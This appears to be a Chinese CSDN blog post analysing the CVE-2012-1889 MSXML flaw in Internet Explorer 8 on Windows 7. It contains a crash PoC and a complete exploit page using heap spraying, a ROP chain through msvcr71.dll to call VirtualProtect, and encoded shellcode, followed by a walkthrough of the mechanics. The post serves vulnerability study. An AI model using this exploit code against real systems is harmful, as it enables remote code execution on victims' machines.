Internet Explorer(CVE-2012-1889)暴雷漏洞分析报告【Win7&IE8版】

最新推荐文章于 2022-10-28 21:25:03 发布
最新推荐文章于 2022-10-28 21:25:03 发布
阅读量631 收藏 1
点赞数
分类专栏: 漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/capnik/article/details/58620700
版权

软件名称:Internet Explorer

软件版本:8.0

漏洞模块:msxml3.dll

模块版本:8.90.1101.0

编译日期:2008年4月14日

操作环境:Win7 x86 sp1/JRE 6.0

漏洞编号:CVE-2012-1889(MS12-043)

危害等级:超危

漏洞类型:缓冲区溢出

威胁类型:远程


1. 软件简介
Internet Explorer,是微软公司推出的一款网页浏览器。原称Microsoft Internet Explorer(6版本以前)和Windows Internet Explorer(7、8、9、10、11版本),简称IE。在IE7以前,中文直译为“网络探路者”,但在IE7以后官方便直接俗称"IE浏览器"。
msxml指微软的xml语言解析器,用来解释xml语言的。就好像html文本下载到本地,浏览器会检查html的语法,解释html文本然后显示出来一样。要使用xml文件就一定要用到xml parser。


2. 漏洞成因
Microsoft XML Core Services (MSXML)是一组服务,可用JScript、VBScript、Microsoft开发工具编写的应用构建基于XML的Windows-native应用。
Microsoft XML Core Services 处理内存中的对象的方式中存在一个远程执行代码漏洞。如果用户查看包含特制内容的网站,则该漏洞可能允许远程执行代码。Microsoft XML Core Services 3.0、4.0、5.0和6.0版本中存在漏洞,该漏洞源于访问未初始化内存位置。

3. 利用过程
远程攻击者可利用该漏洞借助特制的web站点,执行任意代码或导致拒绝服务(内存破坏)。


4. PoC
使用以下代码保存为html文件,在windbg条件下打开IE浏览器,并运行这个html文件,IE浏览器崩溃。

示例代码:

<html>
<head>
    <title>CVE 2012-1889 PoC v2 By:15PB.Com</title>
</head>
<body>
    <object classid="clsid:f6D90f11-9c73-11d3-b32e-00C04f990bb4" id='15PB'></object>
    <script>
	    // 获取名为15PB的对象,并将其保存到名为obj15PB实例中
        var obj15PB = document.getElementById('15PB').object;
		// 初始化数据变量srcImgPath的内容(unescape()是解码函数)
        var srcImgPath = unescape("\u0C0C\u0C0C");
		// 构建一个长度为0x1000[4096*2]字节的数据
        while (srcImgPath.length < 0x1000)
            srcImgPath += srcImgPath;
		// 构建一个长度为0x1000-10[4088*2]的数据,起始内容为“\\15PB_Com”
        srcImgPath = "\\\\15PB_Com" + srcImgPath;
        srcImgPath = srcImgPath.substr(0, 0x1000-10);
        // 创建一个图片元素,并将图片源路径设为srcImgPath
        var emtPic = document.createElement("img");
        emtPic.src = srcImgPath;
        emtPic.nameProp;       // 返回当前图片文件名(载入路径)
        obj15PB.definition(0); // 定义对象(触发溢出)
    </script>
</body>
</html>


点击是



5.Exploit

<html>
<head>
    <title>Step2_Accurate_Heap Spray By:15PB.Com</title>
</head>
<body>
    <object classid="clsid:f6D90f11-9c73-11d3-b32e-00C04f990bb4" id='15PB'></object>
    <script>
// 1.  生成Padding
        var cPadding = unescape("\u0C0C\u0C0C");
        while (cPadding.length < 0x1000)
            cPadding += cPadding;
        cPadding = cPadding.substring(0, 0x5F6);
// 2.  制作ROP
        var cROP = unescape( 
		         "\u1124\u7c34" + //0c0c0c0c  //ret	Addr
		         "\u10fd\u7c34" + //0c0c0c10  //pop ebp Addr
           	     "\u8b05\u7c34" + //0c0c0c14  //xchg eax,esp # ret Addr
          	     "\u1124\u7c34" + //0c0c0c18  //ret	Addr
          	     "\u1124\u7c34" + //0c0c0c1c  //ret	Addr
         	     "\u1124\u7c34" + //0c0c0c20  //ret	Addr
           	     "\u1124\u7c34" + //0c0c0c24  //ret	Addr


     //关键ROP
                 "\u1123\u7c34" + //0c0c0c28  //POP EDI # RETN
		         "\u1124\u7c34" + //0c0c0c2c  //RETN (ROP NOP)
           	     "\u1920\u7c34" + //0c0c0c30  //POP ESI # RETN
          	     "\u15a2\u7c34" + //0c0c0c34  //JMP [EAX]
          	     "\u10fd\u7c34" + //0c0c0c38  //POP EBP #RETN
         	     "\u0c64\u0c0c" + //0c0c0c3c  //RETN TO PAYLOAD
           	     "\u28b8\u7c34" + //0c0c0c40  //POP EBX #RETN
           	     "\u1000\u0000" + //0c0c0c44  //dwSize         = 0x1000
         	     "\u39fa\u7c34" + //0c0c0c48  //POP EDX #RETN
		         "\u0040\u0000" + //0c0c0c4c  //NewProtect  = 0x40
        	     "\u10c3\u7c34" + //0c0c0c50  //POP ECX #RETN
		         "\ucfff\u7c38" + //0c0c0c54  //OldProtect
         	     "\u4cc1\u7c34" + //0c0c0c58  //POP EAX #RETN
         	     "\uA151\u7C37" + //0c0c0c5c  //IAT->VirtualProtect Addr //40-ef=51
         	     "\u8c81\u7c37"  //0c0c0c60  //PUSHAD # ADD AL,0ef #RETN
		     ); 


      
// 3.  准备好Payload(unescape()是解码函数)
        var cPayload = unescape(
        "\u8360\u20EC\u4CEB\u6547\u5074\u6F72\u4163\u6464" +
        "\u6572\u7373\u6F4C\u6461\u694C\u7262\u7261\u4579" +
        "\u4178\u5500\u6573\u3372\u2E32\u6C64\u006C\u654D" +
        "\u7373\u6761\u4265\u786F\u0041\u7845\u7469\u7250" +
        "\u636F\u7365\u0073\u6548\u6C6C\u206F\u3531\u4250" +
        "\u0021\u00E8\u0000\u5B00\u8B64\u3035\u0000\u8B00" +
        "\u0C76\u768B\u8B1C\u8B36\u0856\u5253\u12E8\u0000" +
        "\u8B00\u8DF0\uBD4B\u5251\uD0FF\u5653\u5250\u6EE8" +
        "\u0000\u5500\uEC8B\uEC83\u520C\u558B\u8B08\u3C72" +
        "\u348D\u8B32\u7876\u348D\u8B32\u1C7E\u3C8D\u893A" +
        "\uFC7D\u7E8B\u8D20\u3A3C\u7D89\u8BF8\u247E\u3C8D" +
        "\u893A\uF47D\uC033\u01EB\u8B40\uF875\u348B\u8B86" +
        "\u0855\u348D\u8B32\u0C5D\u7B8D\uB9AF\u000E\u0000" +
        "\uF3FC\u75A6\u8BE3\uF475\uFF33\u8B66\u463C\u558B" +
        "\u8BFC\uBA34\u558B\u8D08\u3204\u8B5A\u5DE5\u08C2" +
        "\u5500\uEC8B\uEC83\u8B08\u145D\u4B8D\u6ACC\u6A00" +
        "\u5100\u55FF\u8D0C\uD74B\u5051\u55FF\u8910\uFC45" +
        "\u4B8D\u51E3\u75FF\uFF08\u1055\u4589\u8DF8\uEF4B" +
        "\u006A\u5151\u006A\u55FF\u6AFC\uFF00\uF855\uE58B" +
        "\uC25D\u0010\u0000");
// 4.  准备好FillData
        // 4.1 计算填充滑板指令数据的大小(都除2是因为length返回的是Unicode的字符个数)
        var nSlideSize = 0x1000;           // 一个滑板指令块的大小(4KB)
        var nPadSize   = cPadding.length;  // Padding大小
		var nR2LSize   = cROP.length; // Ret2Libc大小
        var nPySize    = cPayload.length;  // Shellcode大小
        var nFillSize  = nSlideSize-nPadSize-nR2LSize-nPySize;
        // 4.2 制作好一块填充数据
        var cFillData  = unescape("\u0C0C\u0C0C");
        while (cFillData.length < nSlideSize)
            cFillData += cFillData;
        cFillData = cFillData.substring(0, nFillSize);
		// 5.  构建滑板指令数据块
		var nBlockSize = 0x40000;  // 256KB
        var cBlock     = cPadding + cROP + cPayload + cFillData;
        while (cBlock.length < nBlockSize)
            cBlock += cBlock;
        cBlock = cBlock.substring(2, nBlockSize-0x21);
// 6.  填充200MB的内存区域(申请800块256KB大小的滑板数据区),试图覆盖0x0C0C0C0C
        //     区域,每块滑板数据均由 滑板数据+Shellcode 组成,这样只要任意一块滑板数据
        //     正好落在0x0C0C0C0C处,大量无用的“OR AL,0C”就会将执行流程引到滑板数据区
        //     后面的Shellcode处,进而执行Shellcode。
        var cSlideData = new Array();
        for (var i = 0; i < 800; i++)
            cSlideData[i] = cBlock.substr(0, cBlock.length);
// 7.  触发CVE 2012-1889漏洞
        // 7.1 获取名为15PB的XML对象,并将其保存到名为obj15PB实例中
        var obj15PB = document.getElementById('15PB').object;
        // 7.2 构建一个长度为0x1000-10=8182,起始内容为“\\15PB_Com”字节的数据
        var srcImgPath = unescape("\u0C0C\u0C08");
        while (srcImgPath.length < 0x1000)
            srcImgPath += srcImgPath;
        srcImgPath = "\\\\15PB_Com" + srcImgPath;
        srcImgPath = srcImgPath.substr(0, 0x1000-10);
        // 7.3 创建一个图片元素,并将图片源路径设为srcImgPath,并返回当前图片文件名
        var emtPic = document.createElement("img");
        emtPic.src = srcImgPath;
        emtPic.nameProp;
        // 7.4 定义对象obj15PB(触发溢出)
        obj15PB.definition(0);
    </script></body></html>


6.利用原理
执行Exploit网页后在msxml3.dll中有以下汇编代码: 
mov eax,[ebp-14h]    //eax=0c0c0c08h
……
mov esi,eax 	     //esi=0c0c0c08h
……
mov ecx,[eax]	     //ecx=[0x0c0c0c08] => 0c0c0c0ch
……
call [ecx+18h] 	     //call [0x0c0c0c24]
……
mov eax,[esi]	     //eax=[0x0c0c0c08] => 0c0c0c0ch
……
call [eax+8h]	     //call [0x0c0c0c14]


因为win7下有ASLR,我们特意找到java里面的一个模块msvcr71.dll没有开启ASLR,可以利用模块中的IAT中的VirtualProtect完成利用。那么根据之前的汇编代码,可以构建以下ROP: 

0x0c0c0c00    0c0c0c0ch
0x0c0c0c04    0c0c0c0ch
0x0c0c0c08    0c0c0c0ch
0x0c0c0c0C    0c0c0c0ch
0x0c0c0c10    retn Addr               <-esp  Step_3
0x0c0c0c14    pop exx # retn Addr            Step_4(直接执行下下一步)
0x0c0c0c18    xchg eax,esp # retn Addr       Step_2(关键步骤)
0x0c0c0c1C    retn Addr                      Step_5
0x0c0c0c20    retn Addr        	             Step_6
0x0c0c0c24    retn Addr 	                 Step_1 / Step_7
0x0c0c0c28    POP EDI # RETN
0x0c0c0c2c    RETN (ROP NOP)
0x0c0c0c30    POP ESI # RETN
0x0c0c0c34    JMP [EAX]	                     //跳转IAT
0x0c0c0c38    POP EBP #RETN
0x0c0c0c3c    retn toPayLoad                 //构建VirtualProtect的返回地址
0x0c0c0c40    POP EBX #RETN
0x0c0c0c44    dwSize 	= 0x1000
0x0c0c0c48    POP EDX #RETN
0x0c0c0c4c    NewProtect  = 0x40
0x0c0c0c50    POP ECX #RETN
0x0c0c0c54    OldProtect
0x0c0c0c58    POP EAX #RETN
0x0c0c0c5c    IAT->VirtualProtect Addr        //AL-0xef    //这里要保证eax是正确的,所以要让al减去ef
0x0c0c0c60    PUSHAD # ADD AL,0ef #RETN       //刚好esp指向0x0c0c0c64,构建为VirtualProtect的第一个参数lpAddress
往下面就是PayLoad……

7.结语
触发漏洞的代码是JavaScript中最后一句,即后面obj15PB.definition(0)。definition是DOM对象的一个属性,而且是只读的属性,不可以把属性当作函数来使用并往里面传递参数。

附:
汇编中PUSHAD的压入顺序是EAX、ECX、EDX、EBX、原始 ESP、EBP、ESI 及 EDI.

capnik
关注
专栏目录
浏览器漏洞利用实战
悦分享
10-04 135
C++对象的前4字节存放了指向虚表的指针,如果我们用指向Shellcode的值覆盖了这个指针,调用任何对象的虚函数都会最终执行我们的Shellcode。首先是DEP的绕过。在XP SP3的IE中可以利用msvcrt.dll的代码段来提供Gadget,同时,msvcrt.dll还是一个没有开启ASLR的模块,因此如果所有的ROP Gadget全部来自没有开启ASLR模块,那么既可以绕过DEP,又可以绕过ASLR(不要忘了在Windows 7的IE8上,该漏洞也能触发,Win7中是开启了ASLR的)。
Penetration_Testing_POC-About 渗透测试有关的POC、EXP、脚本、提权、小工具等
weixin_46280935的博客
09-10 5668
Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享,作为笔记吧,欢迎补充。 Penetration_Testing_POC 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone Web APP 提权辅助相关 PC tools-小工具集合 文章/书籍/教程相关 说明 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone 天翼创维awifi路由器存在多处未授权访问漏
CVE-2012-1889漏洞利用
enjoy5512的博客
09-25 3768
ROP技术绕过DEP保护 Heap Spray技术绕过ASLR保护 CVE-2012-1889
Internet ExplorerCVE-2012-1889暴雷漏洞分析报告【WinXP&IE8
精彩的艺术
02-28 525
软件名称:Internet Explorer 软件本:8.0 漏洞模块:msxml3.dll 模块本:8.90.1101.0 编译日期:2008年4月14日 操作系统:Windows XP sp3 漏洞编号:CVE-2012-1889(MS12-043) 危害等级:超危 漏洞类型:缓冲区溢出 威胁类型:远程 1. 软件简介 Internet
漏洞分析报告-CVE-2012-1889暴雷漏洞)
weixin_30532837的博客
05-30 525
CVE-2012-1889漏洞分析及利用(暴雷漏洞) 软件名称:Microsoft Internet Explorer 软件本:6.0\8.0 漏洞模块:msxml3.dll 模块本:-- 编译日期:2008-04-14 操作系统:Windows XP/7 漏洞编号:CVE-2012-1889 危害等级:高危 漏洞类型:缓冲区溢出 威胁类型...
Internet ExplorerCVE-2012-1889暴雷漏洞分析报告【WinXP&IE6
精彩的艺术
02-28 679
软件名称:Internet Explorer 软件本:6.0.2900.5512 漏洞模块:msxml3.dll 模块本:8.90.1101.0 编译日期:2008年4月14日 操作系统:Windows XP sp3 漏洞编号:CVE-2012-1889(MS12-043) 危害等级:超危 漏洞类型:缓冲区溢出 威胁类型:远程 1. 软件简介
暴雷漏洞详细分析
leibso的博客
10-14 797
1 前言 1.1 cve-2012-1889 cve-2012-1889即是“暴雷”的编号,影响范围广,危害级别高。Microsoft XML CoreServices 3.0~6.0本中存在漏洞,该漏洞源于访问未初始化内存的位置。远程攻击者可借助特制的web站点利用该漏洞执行任意代码或导致拒绝服务。 1.2 环境和工具 系统环境:win7 32 + IE 8 工具:WinDb...
IE UAF 漏洞CVE-2012-4969)漏洞分析与利用
giantbranch的专栏
04-05 5351
简介 这是一个UAF的漏洞 实验环境 Windows 7 Sp1 32位 IE 8 windbg IDA mona 漏洞分析 搜了一下metasploit那里有,于是就直接生成exp咯 msf > search CVE-2012-4969 Matching Modules ================ Name
漏洞分析之CVE-2012-4792(UAF)
4ct10n
06-29 2529
0x00 漏洞简介 2012年9月,通用漏洞与披露平台发布了一个存在IE浏览器的UAF漏洞。 报告指出:Microsoft Internet Explorer 6至9本中的mshtml.dll中的CMshtmlEd::Exec函数中存在释放后使用漏洞。远程攻击者可利用该漏洞通过特制的网站,执行任意代码。 0x01 测试环境操作系统:Windows XP sp3浏览器:IE 8.00.6
〖EXP〗Ladon CVE-2021-40444 Office漏洞复现Cobalt Strike上线
K8哥哥
09-15 2428
漏洞概述 北京时间9月8日,绿盟科技CERT监测到微软发布安全通告披露了Microsoft MSHTML 远程代码执行漏洞,攻击者可通过制作恶意的 ActiveX 控件供托管浏览器呈现引擎的 Microsoft Office文档使用,成功诱导用户打开恶意文档后,可在目标系统上以该用户权限执行任意代码。微软在通告中指出已检测到该漏洞被在野利用,请相关用户采取措施进行防护。 MSHTML(又称为Trident)是微软旗下的Internet Explorer 浏览器引擎,也用于 Office 应用程序,以在 Wo
第一次漏洞分析(暴雷漏洞CVE-2012-1889)
九层台
11-30 1263
作为第一次分析,从萌新的角度分析一下漏洞。 环境 windows xp sp3 ie 6 漏洞出现模块msxml3.dll 那么老xp本还没有pie直接找这个地址就行,美滋滋。系统好像是延迟绑定的,在刚开始的时候这个模块并没有加载,让程序运行结束在ctl+g就能找到这个地址了。 触发脚本 &lt;html&gt; &lt;head&gt; &lt;title&gt;CVE 2012-...
CVE-2012-1889暴雷漏洞分析
datouyu0824的博客
03-21 1452
1. 软件简介 IExplorer为微软公司开发的浏览器。 Microsoft XML Core Services(MSXML)微软XML分析程序是一组用于用Jscript、VBScript、Microsoft开发工具编写构筑基于XML的Windows-native应用的服务,用于处理XML中可扩展样式表语言(XSLT)。XML分析程序基于微软的元件对象模型(COM),它实质上是XML语法分析器和XPath处理器的应用编程接口(API)。语法分析器将XML数据组织成树状结构以便于处理,处理器将XML转换
WIN7_64 + CVE-2012-1889的分析
nethm的专栏
09-23 654
一 直接运行网上的POC 网页    双击cve-2012-1889-test-poc.html,发现IE崩溃了,此时的崩溃信息如下:   应用程序本: 8.0.7601.17514   应用程序时间戳: 4ce79912   故障模块名称: msxml3.dll   故障模块本: 8.110.7601.17514   故障模块时间戳: 4ce7b8e9   异常代码:
暴雷CVE-2012-1889漏洞分析报告
ZK_1874的博客
10-28 2596
暴雷CVE-2012-1889漏洞分析报告
基于CVE-2012-1889漏洞的堆喷射利用分析
wojiukanxia的博客
02-27 638
漏洞分析 分析环境 系统:Windows xp pro sp3 软件:IE 6.0,IE8.0 工具:x32dbg,windbg,mona,editplus,Notepad++ 获取poc 漏洞分析 漏洞复现 打开poc样本,使用x32dbg附加IE后,点击允许执行脚本 X32dbg捕获到异常断下 由于对js并不熟悉,这里仅做漏洞的利用学习,主要分析学习堆喷射...
MS12-043(CVE-2012-1889漏洞分析报告
李祥的博客
03-02 1377
MS12-043(CVE-2012-1889漏洞分析报告   软件名称:Internet Explorer 软件本:6.0.2900
利用Metasploit测试一个古老的IE8漏洞(编号CVE-2012-1875)
exploitZhou的博客
07-26 1115
详细步骤: 1. 在exploit-db中寻找漏洞相关的rb文件,(注意:在下载的时候记得关闭各种360以及电脑管家和电脑自带防火墙,不然会有病毒报错),下载地址:Microsoft Internet Explorer - Same ID Property Deleted Object Handling Memory Corruption (MS12-037) 2. 把down好的.rb文件
[漏洞分析]CVE-2012-1889漏洞分析及利用(暴雷漏洞)
anhui8496的博客
05-25 906
软件名称:Microsoft Internet Explorer 软件本:6.0\8.0 漏洞模块:msxml3.dll 模块本:- 编译日期:2008-04-14 操作系统:Windows XP/7 漏洞编号:CVE-2012-1889 危害等级:高危 漏洞类型:缓冲区溢出 威胁类型:远程 1.软件简介 Microso...
%u7F51%u7BA1%u4E4B%u661F NetStar %u9AD8%u6548%u7684%u7F51%u7BA1%u8F6F%u4EF6
热门推荐
weixin_34346099的博客
05-16 1万+
%u7F51%u7BA1%u4E4B%u661F NetStar %u9AD8%u6548%u7684%u7F51%u7BA1%u8F6F%u4EF6%u8F6F%u4EF6%u540D%u79F0:NetStar%u7F51%u7EDC%u8FD0%u7EF4%u7EFC%u5408%u7BA1%u7406%u7CFB%u7EDF%u8F6F%u4EF6%u5927%u5C...
CVE-2012-1876 Win7 IE9 堆溢出漏洞 EXP详解与x64平台分析
本文主要探讨的是CVE-2012-1876漏洞,这是一个针对Microsoft Windows系统,尤其是Windows 7中的IE9浏览器的0day(零日)漏洞。在2012年的Pwn2Own黑客大赛中,安全团队Vupen成功利用这两个漏洞,其中一个是涉及堆溢出...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值